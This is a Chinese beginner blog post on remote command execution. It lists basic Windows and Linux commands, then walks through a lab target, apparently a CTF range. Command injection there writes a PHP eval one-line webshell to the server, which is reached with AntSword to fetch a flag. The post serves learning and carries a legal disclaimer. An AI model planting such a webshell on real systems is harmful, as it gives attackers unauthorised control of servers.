初学RCE漏洞

初学RCE漏洞

远程命令执行

命令注入漏洞---构造恶意的操作执行命令,通过请求的方式将命令传输到服务器中,并执行

操作系统

Windows和Linux

基础的操作系统命令

windows

命令行-- win+r --> 输入cmd回车

测试与目标之间的连通性(能否与对方相互传输数据) --- ping 域名/IP地址

查看当前目录下的所有文件/文件夹 --- dir

新建文件夹 --- mkdir

切换目录(文件夹) --- cd 相对路径/绝对路径

绝对路径:完整路径

相对路径:有使用./和../

​ ../ --- 上一级文件夹

​ ./ --- 当前文件夹

新建文件夹 --- type nul > 文件名称

读取文件 --- type

写入文件 ---- echo

​ echo 123456 > xx.txt ------ 将123456写入(覆盖)到xx.txt

​ echo 123456 >> xx.txt ------- 将123456写入(追加) 到xx.txt

Linux

测试与目标之间的连通性(能否与对方相互传输数据) --- ping 域名/IP地址

查看当前目录下的所有文件/文件夹 --- ls/dir(不常用) (经常用于判断是否为Linux系统)

新建文件夹 --- mkdir

新建文件夹 --- touch 文件名称

读取文件 ----- cat

写入文件 ---- echo

​ echo 123456 > xx.txt ------ 将123456写入(覆盖)到xx.txt

​ echo 123456 >> xx.txt ------- 将123456写入(追加) 到xx.txt

实操

http://43.139.231.237:34063/

用dir进行查看

image-20251122234714223

image-20251122234727856

检测是哪种操作系统

image-20251122234754825

确定之后往里面新建php文件,为之后植入一句话木马做准备

image-20251122235016437

输入一句话木马echo ‘<?php @eval($_POST[%27888%27]);?》’>jiaqi.php

image-20251122235314550

打开中国蚁剑进行验证是否注入一句话木马

蚁剑连接网址:所处文件位置+目标.php 如http://43.139.231.237:34063/search/chaojijiaqi.php

image-20251122235647289

进入后查找目标flag

image-20251122235753818

image-20251122235806661

image-20251122235833051

image-20251122235913820

image-20251123000004124

image-20251123000042172

最后获取flag

以上操作需在法律规定范围内,可攻击靶场内才可执行

posted @ 2025-11-23 00:13  地方管委主任  阅读(37)  评论(0)    收藏  举报